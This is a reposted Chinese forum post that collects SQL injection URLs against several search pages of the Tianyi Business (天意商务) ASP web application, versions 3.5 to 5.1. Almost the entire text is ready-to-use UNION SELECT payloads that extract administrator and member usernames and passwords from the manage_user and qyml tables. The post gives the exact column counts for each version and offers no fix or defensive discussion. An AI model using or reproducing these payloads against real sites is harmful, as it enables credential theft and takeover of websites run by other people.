[转载]天意商务部分搜索利用Union语句

信息来源：非安全


***********************************
*                      *
*  天意商务程序部分搜索利用语句： *
*                      *
***********************************


=====================================================
商业机会  //网页 syjh
--------------------------
  search.asp
--------------------------
  利用txtilte提交值

  管理员:

  5.1版：24个字段
      http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from manage_user  where id between 1 and 20 union select * from info where showname like '%jm

  4.5版：23个字段
      http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from manage_user  where id between 1 and 20 union select * from info where showname like '%jm

  3.5版：22个字段
      http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from manage_user  where id between 1 and 20 union select * from info where showname like '%jm
  
用户:
      http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,user,3,4,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from qyml  where id between 1 and 20 union select * from info where showname like '%jm

---------------------------
  type提交值

  管理员:
      http://127.0.0.1/ty51/syjh/search.asp?type=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from manage_user  where id between 1 and 20 union select * from info where type like '%jm

  用户:
      http://127.0.0.1/ty51/syjh/search.asp?type=jm%' union select 1,user,3,4,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from qyml  where id between 1 and 20 union select * from info where type like '%jm

----------------------------
info 表 : 5.1版中24个字段  4.5版中23个字段  3.5版中22个字段

========================================
  syjh 目录内的 sjsearch.asp
-------------------------------
  利用txtitle提交

  管理员:
      http://127.0.0.1/ty51/syjh/sjsea ... 788&txtitle=jm%' union select 1,2,username,password,5,6,7,8,9,10 from manage_user where id between 1 and 20 union select type,Info_ID,showname,dateandtime,web,gsid,company,country,city,content from info where showname like '%jm
-----------------------------------
5.1版10个字段  4.5版10个字段  3.5版22个字段
-----------------------------------

   type提交值

   管理员:
       http://127.0.0.1/ty51/syjh/sjsearch.asp?type=采购&keyword=0&datetime=7788&txtitle=jm%'%20union%20select%201,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20manage_user where id between 1 and 20 union%20select%20*%20from%20info%20where%20showname%20like%20'%jm
-------------------------------------
5.1版24个字段  4.5版10个字段  3.5版22个字段
-------------------------------------

*********************************************

产品展示  spzs

-----------------------------------
  search.asp
----------------------------------
  管理员:
       http://127.0.0.1/ty51/spzs/search.asp?txtitle=jm%' union select 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from manage_user where id between 1 and 20 union select * from spzs where cpmc like '%jm

------------------------------------
5.1版中29个字段  4.5版中28个字段  3.5版中28个字段

**********************************************

企业名录  qyml

---------------------------------------
  qyml.asp
---------------------------------------
  利用txtitle提交

  管理员
      http://127.0.0.1/ty51/qyml/qyml.asp?txtitle=jm'%  union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where qymc like '%jm
----------------------------------------
  利用qylb 提交

  管理员
      http://127.0.0.1/ty51/qyml/qyml.asp?qylb=jm'%  union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where qylb like '%jm
------------------------------------------
   利用sf提交

   管理员
      http://127.0.0.1/ty51/qyml/qyml.asp?sf=jm'%  union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where sf like '%jm
-----------------------------------------
5.1版10个字段  3.5版46个字段  4.5版46个字段
------------------------------------------
  search.asp 利用
------------------------------------------
  利用txtitle提交

  管理员:
      http://127.0.0.1/ty51/qyml/search.asp?sortid=1&txtitle=jm%' union select 1,2,3,4,username,password,7,8,9,10,11 from manage_user where id between 1 and 20 union select flag,url,id,qymc,qorder,zycp,sf,web,city,jygs,idate from qyml where qymc like '%jm

-------------------------------------------
  利用qylb 提交

  管理员:
      http://127.0.0.1/ty51/qyml/search.asp?sortid=1&qylb=jm%' union select 1,2,3,4,username,password,7,8,9,10,11 from manage_user where id between 1 and 20 union select flag,url,id,qymc,qorder,zycp,sf,web,city,jygs,idate from qyml where qylb like '%jm

-------------------------------------------
5.1版11个字段    4.5版46个字段  3.5版46个字段


***********************************************

行业信息  hyxx

--------------------------------------
  more.asp
-------------------------------------
  利用txtitle 提交   只显示一个字段,

  管理员名称
      http://127.0.0.1/ty51/hyxx/more.asp?typeid=0&txtitle=jm'% union select 1,username,3,4,5,6,7,8,9,10,11 from manage_user where id between 1 and 20 union select * from hyxx where content like '%jm

  管理员密码:
      http://127.0.0.1/ty51/hyxx/more.asp?typeid=0&txtitle=jm'% union select 1,password,3,4,5,6,7,8,9,10,11 from manage_user where id between 1 and 20 union select * from hyxx where content like '%jm
-------------------------------------
hyxx 5.1 11个字段 4.5 11个字段 3.5 11个字段
---------------------------------------
*****************************************

人才市场  job/

----------------------------------------
jobsearch.asp
----------------------------------------

   利用txtitle 提交

   管理员
       http://127.0.0.1/ty51/job/jobsearch.asp?txtitle=jm%'%20union%20select%201,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20manage_user where id between 1 and 20 union%20select%20*%20from%20job%20where%20showname%20like%20'%jm

-----------------------------------------
   利用type 提交

   管理员
       http://127.0.0.1/ty51/job/jobsearch.asp?type=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from manage_user where id between 1 and 20 union select * from job where type like '%jm
-------------------------------------------

5.1版22个字段  4.5版21个字段  3.5版21个字段
-------------------------------------------
psearch.asp
------------------------------------------

  利用txtitle 提交

  管理员
      http://127.0.0.1/ty51/job/psearch.asp?txtitle=jm%' union select 1,2,3,4,5,username,7,8,9,10,11,12,password,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from manage_user where id between 1 and 20 union select * from person where zye like '%jm

  用户:
      http://127.0.0.1/ty51/job/psearch.asp?txtitle=jm%' union select 1,2,3,4,5,user,7,8,9,10,11,12,pass,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from qyml where id between 1 and 20 union select * from person where zye like '%jm



-------------------------------------------
5.1版30个字段  4.5版30个字段   3.5版30个字段
-------------------------------------------

*************************************************

商务服务  qyfw/

-----------------------------------------
more.asp
----------------------------------------
  利用txtitle 提交   只显示一个字段,

  管理员名称
       http://127.0.0.1/ty51/qyfw/more.asp?typeid=0&txtitle=jm%' union select 1,username,3,4,5,6,7,8,9 from manage_user where id between 1 and 20 union select * from Commerce where content like '%jm

  管理员密码:
       http://127.0.0.1/ty51/qyfw/more.asp?typeid=0&txtitle=jm%' union select 1,password,3,4,5,6,7,8,9 from manage_user where id between 1 and 20 union select * from Commerce where content like '%jm

**************************************************